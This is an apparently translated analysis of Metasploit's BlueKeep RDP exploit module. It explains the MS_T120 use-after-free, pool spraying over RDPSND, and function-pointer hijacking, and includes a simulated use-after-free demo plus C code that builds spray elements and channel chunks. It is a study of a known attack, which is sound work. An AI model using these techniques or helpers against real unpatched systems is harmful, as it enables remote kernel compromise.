
A brief analysis of the Metasploit BlueKeep exploit module

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

In this issue the editor presents a brief analysis of how the Metasploit BlueKeep module exploits the vulnerability. The article is analyzed and described from a professional point of view; we hope you take something away from it.

* Solemn declaration: this article is limited to technical discussion and sharing; using it for any illegal purpose is strictly prohibited.

On September 7, Metasploit released a BlueKeep remote desktop code execution exploit module together with an analysis blog post. The module targets 64-bit Windows 7 systems and 64-bit Windows Server 2008 systems on which remote desktop audio playback has been enabled. This article briefly analyzes the exploit module together with the relevant parts of the RDP implementation.

Vulnerability principle

BlueKeep is a use-after-free vulnerability. When a vulnerable Remote Desktop server receives a specially crafted packet, it frees the control structure of the internal virtual channel MS_T120 but does not clear the pointer to that structure, and it later calls a function pointer inside the MS_T120 structure when the remote desktop connection terminates. If an attacker can re-occupy the freed MS_T120 block by sending data remotely and place a suitable value in the structure's function pointer, remote code execution results. For a detailed analysis of the vulnerability, see the relevant Kanxue (Snow) Security Summit talk, the analysis by security researcher Hutchins, and the write-up by GitHub user 0xeb-bp.
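The following is a simplified C model of the flaw just described, added here as an illustration; it is the editor's code, not termdd.sys and not the Metasploit module. Memory is a tiny fixed-size slot pool (my assumption: eight slots are enough to show reuse), the object size and callback offset are the 0x160 and 0x100 values the article quotes, and the benign_close/attacker_fn callbacks are placeholders. It shows why freeing the channel without clearing the connection's reference is sufficient: a stale pointer happens to keep working while the slot is untouched, and an attacker who refills the slot controls the call made at disconnect.

```c
/* Simplified model of the bug class the text describes, added as an
 * illustration; this is not code from termdd.sys or from the Metasploit
 * module. A channel object is freed on a client-triggered path, its pointer
 * stays in the connection's channel table, and disconnect later calls a
 * function pointer inside the object. Memory is a tiny fixed-size slot pool
 * (standing in for the non-paged pool blocks of this size), so re-occupying
 * the freed slot is deterministic and safe to run. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SLOT_SIZE  0x160   /* MS_T120 allocation size quoted by the article */
#define CB_OFFSET  0x100   /* function-pointer offset quoted by the article */
#define NSLOTS     8       /* assumption: a small pool is enough to show reuse */
#define NCHANNELS  4

typedef void (*chan_cb_t)(void);

static uint8_t pool[NSLOTS][SLOT_SIZE];
static int     pool_used[NSLOTS];

static void *pool_alloc(void)
{
    for (int i = 0; i < NSLOTS; i++)
        if (!pool_used[i]) { pool_used[i] = 1; return pool[i]; }
    return NULL;
}

static void pool_free(void *p)
{
    for (int i = 0; i < NSLOTS; i++)
        if (pool[i] == p) pool_used[i] = 0;   /* freed, but contents are left as-is */
}

struct conn { void *chan[NCHANNELS]; };       /* per-connection channel table */

static int benign_calls, hijacked_calls;
static void benign_close(void) { benign_calls++; }
static void attacker_fn(void)  { hijacked_calls++; }

static void chan_create(struct conn *c, int idx)
{
    uint8_t *obj = pool_alloc();
    chan_cb_t cb = benign_close;
    memset(obj, 0, SLOT_SIZE);
    memcpy(obj + CB_OFFSET, &cb, sizeof cb);
    c->chan[idx] = obj;
}

/* vulnerable shape: the object is freed but the table still points at it */
static void chan_release_vuln(struct conn *c, int idx)
{
    pool_free(c->chan[idx]);
}

/* hardened shape: clear the reference so no later path can reach the freed object */
static void chan_release_fixed(struct conn *c, int idx)
{
    if (!c->chan[idx]) return;
    pool_free(c->chan[idx]);
    c->chan[idx] = NULL;
}

/* attacker spray: fill free SLOT_SIZE blocks with data carrying attacker_fn at CB_OFFSET */
static int spray(int count)
{
    int got = 0;
    for (int i = 0; i < count; i++) {
        uint8_t *b = pool_alloc();
        chan_cb_t cb = attacker_fn;
        if (!b) break;
        memset(b, 0x41, SLOT_SIZE);
        memcpy(b + CB_OFFSET, &cb, sizeof cb);
        got++;
    }
    return got;
}

/* disconnect: invoke the close callback of every channel still in the table */
static void disconnect(struct conn *c)
{
    for (int i = 0; i < NCHANNELS; i++) {
        chan_cb_t cb;
        if (!c->chan[i]) continue;
        memcpy(&cb, (uint8_t *)c->chan[i] + CB_OFFSET, sizeof cb);
        cb();
    }
}

/* one run: returns how many times the attacker-controlled pointer was called */
static int run(int fixed, int spray_count)
{
    struct conn c = {{0}};
    memset(pool_used, 0, sizeof pool_used);
    benign_calls = hijacked_calls = 0;
    chan_create(&c, 0);                 /* an ordinary channel, e.g. RDPDR */
    chan_create(&c, 1);                 /* the channel freed early, like MS_T120 */
    if (fixed) chan_release_fixed(&c, 1); else chan_release_vuln(&c, 1);
    spray(spray_count);
    disconnect(&c);
    return hijacked_calls;
}

int main(void)
{
    printf("vulnerable, sprayed : hijacked=%d\n", run(0, NSLOTS)); /* 1 */
    printf("vulnerable, no spray: hijacked=%d\n", run(0, 0));      /* 0: stale pointer still works by luck */
    printf("fixed, sprayed      : hijacked=%d\n", run(1, NSLOTS)); /* 0 */
    return 0;
}
```

Clearing the reference on release (chan_release_fixed) is the minimal fix within this model; it is not a description of Microsoft's actual patch for the vulnerability.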

Exploitation process of the Metasploit BlueKeep module

The analysis is based on the file cve_2019_0708_bluekeep_rce.rb. After the module starts, it first scans the target for the BlueKeep vulnerability (see the scanning principle linked in the original). If the target is vulnerable, the exploitation process begins: an RDP connection is established and two virtual channels are registered, MS_T120 (to trigger the vulnerability) and RDPSND (for kernel pool spraying). Once the RDP connection is up, the RDPDR channel performs its handshake with the client, as the Wireshark capture in the original article shows; the relevant protocol is documented by Microsoft. After receiving the CLIENTID_CONFIRM message on the RDPDR channel, the module assumes that the RDP connection is fully established and moves on to the next exploitation step.

First, the MS_T120 structure and the use of RDPSND to allocate data in the kernel non-paged pool. The MS_T120 structure is allocated by the RDP component termdd.sys to control the MS_T120 virtual channel of an RDP connection. The definition of this structure type appears in a Microsoft RDP driver development document; most of its field names are listed as reserved, but by combining the document with termdd.sys the meaning of the data can be worked out.

The channel control structure is created and its memory allocated in termdd!IcaAllocateChannel. As can be seen there, the memory comes from the kernel non-paged pool and the size is 0x160 bytes. To re-occupy the MS_T120 block after it is freed and control the values of its key fields, a large amount of controllable data of the same size must first be allocated in the kernel non-paged pool. This requires a kernel pool spray through the RDP protocol (a non-RDP pool spray can serve the same purpose: zerosum0x0, the module's main contributor, has shared a BlueKeep exploit that sprays the pool using SMBLoris and IP fragments, but requiring the target to expose additional services undoubtedly adds to the exploitation conditions). The spray can be achieved by sending data to a particular virtual channel (see the linked documentation for the virtual channel packet format). Data sent to a virtual channel is processed by IcaChannelInputInternal in termdd.sys, which performs different operations depending on the state of the virtual channel. The key code is as follows:

Note the check at line 154: IrpList is a linked list of queued IRP read requests in the virtual channel structure. If the list is not empty, IcaChannelInputInternal takes an IRP from it and copies the received data into that request, and no non-paged pool allocation is made for the data. If the list is empty, IcaChannelInputInternal caches the received data in the kernel non-paged pool, and this is when pool spraying is possible, as shown below:

As can be seen, the received data is stored in full in the kernel non-paged pool, but note that the allocation is 0x38 bytes larger than the data, and those extra bytes are not attacker-controlled: they hold metadata about the cached data such as its length and position and links to the previous and next cached blocks. The RDPSND virtual channel chosen by the Metasploit BlueKeep module satisfies the requirement that IrpList is empty, which can be verified with a kernel debugger.

However, the RDPSND channel implements remote desktop audio playback, and if that feature is disabled, RDPSND is closed before the RDP connection is established. Remote desktop audio playback is enabled by default on Windows 7 and disabled by default on Windows Server 2008, where it can only be enabled through the Remote Desktop Session Host configuration options (or via the registry).

Sending Size bytes of data to the RDPSND channel results in a Size + 0x38 byte allocation in the kernel non-paged pool, which can be used both to occupy the freed MS_T120 structure and to write shellcode. It follows that 0x128 bytes must be sent so that a 0x160-byte block, the same size as the MS_T120 structure, is allocated. The Metasploit BlueKeep module sends a large number of 0x128-byte payloads, occupying many 0x160-byte blocks in the non-paged pool, then sends the packet that triggers the MS_T120 release, and then sends 0x128-byte payloads again. Because most free 0x160-byte blocks have already been consumed, the 0x160-byte block that the just-released MS_T120 structure occupied is very likely to be reused by one of these newly sent payloads.

After the freed MS_T120 structure has been successfully re-occupied, the module continues to write a large amount of shellcode into the kernel via RDPSND.

Finally, the module disconnects the RDP connection to trigger shellcode execution.

This step is not completely stable. After taking control of the MS_T120 structure, the module sets the function pointer in the structure (offset 0x100) to an address in the kernel non-paged pool address range (see the Windows x64 kernel virtual address space layout) and expects the shellcode written into the kernel to land at that address. If it does, remote code execution proceeds; if it does not, the target blue-screens. The Metasploit BlueKeep module presets different addresses for different scenarios, selectable through the target option before running the exploit.
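As an added worked example (the editor's code, not the module's), the following C program carries out the size arithmetic and framing discussed above: it derives the 0x128-byte spray length from the 0x160 MS_T120 size and the 0x38 cache header, places a function pointer so that it overlays structure offset 0x100, and wraps the payload in MS-RDPBCGR CHANNEL_PDU_HEADER chunks, which also shows the 1600-byte per-chunk limit behind the egg-hunter remark in the shellcode discussion. Assumptions: the 0x38 metadata precedes the cached data (so structure offset 0x100 is data offset 0xC8), and the kernel address 0xfffffa8001800000 is a placeholder within the Windows 7 x64 non-paged pool range, not one of the module's target presets. The lower protocol layers (TPKT, X.224, MCS, encryption) that carry the channel PDU are not modelled.

```c
/* Added example: the size arithmetic and channel framing described in the
 * text, written by the editor, not code from the Metasploit module. The
 * article states that termdd caches a virtual-channel chunk in an
 * allocation of data length + 0x38, so 0x128 bytes sent on RDPSND occupy a
 * 0x160-byte block, the size of MS_T120, and that the structure's function
 * pointer is at offset 0x100. Assumption (mine): the 0x38 metadata precedes
 * the data, so structure offset 0x100 is data offset 0xC8. Framing follows
 * the MS-RDPBCGR CHANNEL_PDU_HEADER (length, flags) with 1600-byte chunks;
 * the TPKT/X.224/MCS layers and encryption are out of scope. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define POOL_CACHE_HDR       0x38
#define MS_T120_SIZE         0x160
#define MS_T120_FNPTR_OFF    0x100
#define CHANNEL_CHUNK_LENGTH 1600
#define CHANNEL_FLAG_FIRST   0x01
#define CHANNEL_FLAG_LAST    0x02

static void put_le32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static void put_le64(uint8_t *p, uint64_t v) { for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i)); }
uint32_t get_le32(const uint8_t *p) { uint32_t v = 0; for (int i = 0; i < 4; i++) v |= (uint32_t)p[i] << (8 * i); return v; }
uint64_t get_le64(const uint8_t *p) { uint64_t v = 0; for (int i = 0; i < 8; i++) v |= (uint64_t)p[i] << (8 * i); return v; }

/* channel data length that makes termdd allocate a block of pool_block bytes */
size_t spray_data_size(size_t pool_block)
{
    return pool_block > POOL_CACHE_HDR ? pool_block - POOL_CACHE_HDR : 0;
}

/* one spray element: filler bytes with fnptr placed where it overlays MS_T120+0x100 */
size_t build_fake_ms_t120(uint8_t *out, size_t cap, uint64_t fnptr, uint8_t filler)
{
    size_t len = spray_data_size(MS_T120_SIZE);         /* 0x128 */
    size_t off = MS_T120_FNPTR_OFF - POOL_CACHE_HDR;    /* 0xC8 */
    if (cap < len) return 0;
    memset(out, filler, len);
    put_le64(out + off, fnptr);
    return len;
}

/* Split data into CHANNEL_PDU_HEADER-framed chunks of at most 1600 bytes.
 * The length field carries the total reassembled length in every chunk;
 * FIRST marks the first chunk and LAST the final one. Returns the chunk
 * count and writes the encoded size to *out_len, or returns 0 on error. */
size_t build_channel_chunks(uint8_t *out, size_t cap, const uint8_t *data, size_t len, size_t *out_len)
{
    size_t pos = 0, o = 0, n_chunks = 0;
    if (len == 0) return 0;
    while (pos < len) {
        size_t n = len - pos;
        uint32_t flags = 0;
        if (n > CHANNEL_CHUNK_LENGTH) n = CHANNEL_CHUNK_LENGTH;
        if (pos == 0) flags |= CHANNEL_FLAG_FIRST;
        if (pos + n == len) flags |= CHANNEL_FLAG_LAST;
        if (o + 8 + n > cap) return 0;
        put_le32(out + o, (uint32_t)len);
        put_le32(out + o + 4, flags);
        memcpy(out + o + 8, data + pos, n);
        o += 8 + n; pos += n; n_chunks++;
    }
    if (out_len) *out_len = o;
    return n_chunks;
}

int main(void)
{
    /* placeholder kernel address inside the Win7 x64 non-paged pool range;
     * the module's own per-target values are not reproduced here */
    uint64_t fnptr = 0xfffffa8001800000ULL;
    uint8_t elem[0x200], frame[0x200];
    size_t elen = build_fake_ms_t120(elem, sizeof elem, fnptr, 0x41);
    size_t flen = 0, chunks = build_channel_chunks(frame, sizeof frame, elem, elen, &flen);
    printf("spray element: %zu bytes -> pool block 0x%zx\n", elen, elen + POOL_CACHE_HDR);
    printf("fnptr at data offset 0x%zx, %zu chunk(s), %zu bytes on the wire\n",
           (size_t)(MS_T120_FNPTR_OFF - POOL_CACHE_HDR), chunks, flen);
    return 0;
}
```

A shellcode buffer of several kilobytes goes through build_channel_chunks as several 1600-byte pieces, each cached by the server as its own allocation; that is why the text later notes that the user-mode payload has to be located at run time rather than at a fixed offset.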

When exploitation succeeds, shellcode execution is triggered at termdd!IcaChannelInputInternal+0x17d.

Because the trigger point lies inside termdd.sys, the IRQL is DISPATCH_LEVEL when the shellcode runs, which requires special handling. The logic of the BlueKeep module's shellcode is essentially the same as EternalBlue's: first hook the syscall handler, then use APC injection to move from ring 0 to ring 3. The difference is that BlueKeep's shellcode locates and copies the user-mode payload with an egg hunter while it runs (because the data size of a single virtual channel transmission is limited), whereas EternalBlue's user-mode payload sits at a fixed offset.

Figure: BlueKeep kernel shellcode

Figure: EternalBlue kernel shellcode

To avoid the complication of returning into IcaChannelInputInternal, the BlueKeep shellcode returns directly to the caller of IcaChannelInputInternal after hooking the syscall handler.

This part of the shellcode mirrors the function epilogue at the end of IcaChannelInputInternal.

This does introduce a small problem, however: IcaChannelInputInternal acquired the synchronization lock in the channel structure earlier, and because the function is exited directly here, that lock is never released.
